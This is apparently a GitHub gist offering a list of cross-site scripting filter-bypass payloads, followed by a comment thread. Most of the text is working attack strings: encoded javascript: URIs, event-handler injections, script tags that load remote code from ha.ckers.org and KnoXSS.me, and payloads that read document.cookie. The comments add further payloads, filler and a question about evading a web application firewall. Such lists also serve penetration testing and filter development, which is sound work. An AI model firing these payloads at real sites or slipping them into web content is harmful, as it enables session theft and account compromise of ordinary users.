XSS Filter Bypass List
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"<XSS>=&{()}
0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>
<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
<IMG SRC="javascript:alert('XSS');">
<IMG SRC=javascript:alert('XSS')>
<IMG SRC=JaVaScRiPt:alert('XSS')>
<IMG SRC=javascript:alert("XSS")>
<IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
<a onmouseover="alert(document.cookie)">xxs link</a>
<a onmouseover=alert(document.cookie)>xxs link</a>
<IMG """><SCRIPT>alert("XSS")</SCRIPT>">
<IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
<IMG SRC=# onmouseover="alert('xxs')">
<IMG SRC= onmouseover="alert('xxs')">
<IMG onmouseover="alert('xxs')">
<IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
<IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
&#39;&#88;&#83;&#83;&#39;&#41;>
<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
<IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
<IMG SRC="jav ascript:alert('XSS');">
<IMG SRC="jav&#x09;ascript:alert('XSS');">
<IMG SRC="jav&#x0A;ascript:alert('XSS');">
<IMG SRC="jav&#x0D;ascript:alert('XSS');">
<IMG SRC=" &#14; javascript:alert('XSS');">
<SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
<SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<<SCRIPT>alert("XSS");//<</SCRIPT>
<SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
<SCRIPT SRC=//ha.ckers.org/.j>
<IMG SRC="javascript:alert('XSS')"
<iframe src=http://ha.ckers.org/scriptlet.html <
\";alert('XSS');//
</script><script>alert('XSS');</script>
</TITLE><SCRIPT>alert("XSS");</SCRIPT>
<INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
<BODY BACKGROUND="javascript:alert('XSS')">
<IMG DYNSRC="javascript:alert('XSS')">
<IMG LOWSRC="javascript:alert('XSS')">
<STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
<IMG SRC='vbscript:msgbox("XSS")'>
<IMG SRC="livescript:[code]">
<BODY ONLOAD=alert('XSS')>
<BGSOUND SRC="javascript:alert('XSS');">
<BR SIZE="&{alert('XSS')}">
<LINK REL="stylesheet" HREF="javascript:alert('XSS');">
<LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
<STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
<META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
<STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
<STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
<IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
exp/*<A STYLE='no\xss:noxss("*//*");
xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
<STYLE TYPE="text/javascript">alert('XSS');</STYLE>
<STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
<STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
<XSS STYLE="xss:expression(alert('XSS'))">
<XSS STYLE="behavior: url(xss.htc);">
¼script¾alert(¢XSS¢)¼/script¾
<META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
<META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
<META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
<IFRAME SRC="javascript:alert('XSS');"></IFRAME>
<IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
<FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
<TABLE BACKGROUND="javascript:alert('XSS')">
<TABLE><TD BACKGROUND="javascript:alert('XSS')">
<DIV STYLE="background-image: url(javascript:alert('XSS'))">
<DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
<DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
<DIV STYLE="width: expression(alert('XSS'));">
<!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
<BASE HREF="javascript:alert('XSS');//">
<OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
<!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
<? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
<IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
<META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
<HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
<SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
<A HREF="http://66.102.7.147/">XSS</A>
0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
veris-->group<svg/onload=alert(/XSS/)//
#"><img src=M onerror=alert('XSS');>
element[attribute='<img src=x onerror=alert('XSS');>
[<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
%22;alert%28%27RVRSH3LL_XSS%29//
javascript:alert%281%29;
<w contenteditable id=x onfocus=alert()>
alert;pg("XSS")
<svg/onload=%26%23097lert%26lpar;1337)>
<script>for((i)in(self))eval(i)(1)</script>
<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
<sCR<script>iPt>alert(1)</SCr</script>IPt>
<a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>

ninja25538 commented Aug 8, 2017

Nice!, Thanks!

Noob-Walid commented Oct 12, 2017

which worked most??

Cache-Bounty commented Apr 6, 2018

test

CesBear commented May 8, 2018

cool

xeno6696 commented May 10, 2018

@Noob-Walid: It's doubtful that any of these are going to "work" right out of the box. You'll want to use a fuzzer against a suspected form field, and see what tag types even partially "make it through." Though, all of these inputs are available at OWASP, and actually are also available from both fuzzdb and SecLists in text files that contain the name "rsnake."

As a matter of fact, all of you should just clone those repos.

0xINT3 commented Sep 1, 2018

many don't even work. websites are getting smart. :/

sittminzaw commented Sep 5, 2018

"autofocus/onfocus=alert(`Bug´)-->
also work

IvanGuGon1 commented Jan 1, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>

Marshmellow471 commented Jan 26, 2019

Marshmellow471 commented Jan 26, 2019

rip github xss protection

Marshmellow471 commented Jan 26, 2019

here, sons. <img src = x onerror = alert( document.cookies ) >

Marshmellow471 commented Jan 26, 2019

start with > and without the spaces

Marshmellow471 commented Jan 26, 2019

fuck

Marshmellow471 commented Jan 26, 2019

<h1>no</h1>

Marshmellow471 commented Jan 26, 2019

no

shamrocksu88 commented Feb 1, 2019

KNOX

shamrocksu88 commented Feb 1, 2019

KNOX

shamrocksu88 commented Feb 1, 2019

S05PWA==

shamrocksu88 commented Feb 1, 2019

PDFLTk9YPDE=

shamrocksu88 commented Feb 1, 2019

'"KNOX

shamrocksu88 commented Feb 1, 2019

KNOX\

shamrocksu88 commented Feb 1, 2019

confirmK

shamrocksu88 commented Feb 1, 2019

(confirm)(1)

shamrocksu88 commented Feb 1, 2019

'-confirmK-'

shamrocksu88 commented Feb 1, 2019

"-confirmK-"

shamrocksu88 commented Feb 1, 2019

${(confirm)(1)}

shamrocksu88 commented Feb 1, 2019

1</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

nizeman72 commented Feb 12, 2019

<sCR<script>iPt>alert(1)</SCr</script>IPt>

nizeman72 commented Feb 12, 2019

iji

nizeman72 commented Feb 12, 2019

<SCRIPT>document.write("PT SRC="http://ha.ckers.org/xss.js"</SCRIPT>

nizeman72 commented Feb 12, 2019

<script>document.write("PT SRC="http://ha.ckers.org/xss.js"></script>

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"></script>

nizeman72 commented Feb 12, 2019

<script>document.write("pt src="http://ha.ckers.org/xss.js"</script>

nizeman72 commented Feb 12, 2019

<img src=xonerror=alert( document.cookies)>

nizeman72 commented Feb 12, 2019

<img src = x onerror = alert( document.cookies ) >

nizeman72 commented Feb 12, 2019

<scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=`https://KnoXSS.me\x2F00?1=6243</script>

nizeman72 commented Feb 12, 2019

</Script/"'--><Svg /OnLoad=appendChild(createElement(Script)).src=https://KnoXSS.me\x2F00?1=6243>

nizeman72 commented Feb 12, 2019

nizeman72 commented Feb 16, 2019

Lol

nizeman72 commented Feb 16, 2019

test

nizeman72 commented Feb 16, 2019

<script>alert(fuck)</script>

Yashin2134 commented Feb 22, 2019

Yashin2134 commented Feb 22, 2019

Skip to content
Search…
All gists
Back to GitHub
New gist
@Yashin2134
187
68 @rvrsh3llrvrsh3ll/xxsfilterbypass.lst
Last active 2 days ago •

<script src="https://gist.github.com/rvrsh3ll/09a8b933291f9f98e8ec.js"></script>

Code Revisions 4 Stars 187 Forks 68
XSS Filter Bypass List
xxsfilterbypass.lst
';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
'';!--"=&{()}
0"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
<script/src=data:,alert()>
<marquee/onstart=alert()>
<video/poster/onerror=alert()>
<isindex/autofocus/onfocus=alert()>

<SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>

xxs link xxs link

<SCRIPT>alert("XSS")</SCRIPT>">

Yashin2134 commented Feb 22, 2019

<SCRIPT>alert("XSS")</SCRIPT>">

wlanpsk commented Mar 28, 2019

Mmm

EDMPL commented Apr 1, 2019

test

EDMPL commented Apr 1, 2019

nice

s04v commented Apr 9, 2019

Test

itayze commented Apr 13, 2019

<IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
#0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>

ABCyborg25 commented Apr 15, 2019

Hi All,

I am new to InfoSec and need a small help from you dignitaries

While performing XSS, what if my web application firewall is blocking certain words like Alert, Script etc.?

TIA for your answers!

m1lw0rm commented Apr 16, 2019

m1lw0rm commented Apr 16, 2019

T3ap0T commented Apr 18, 2019

rofl xss in the comments
plz
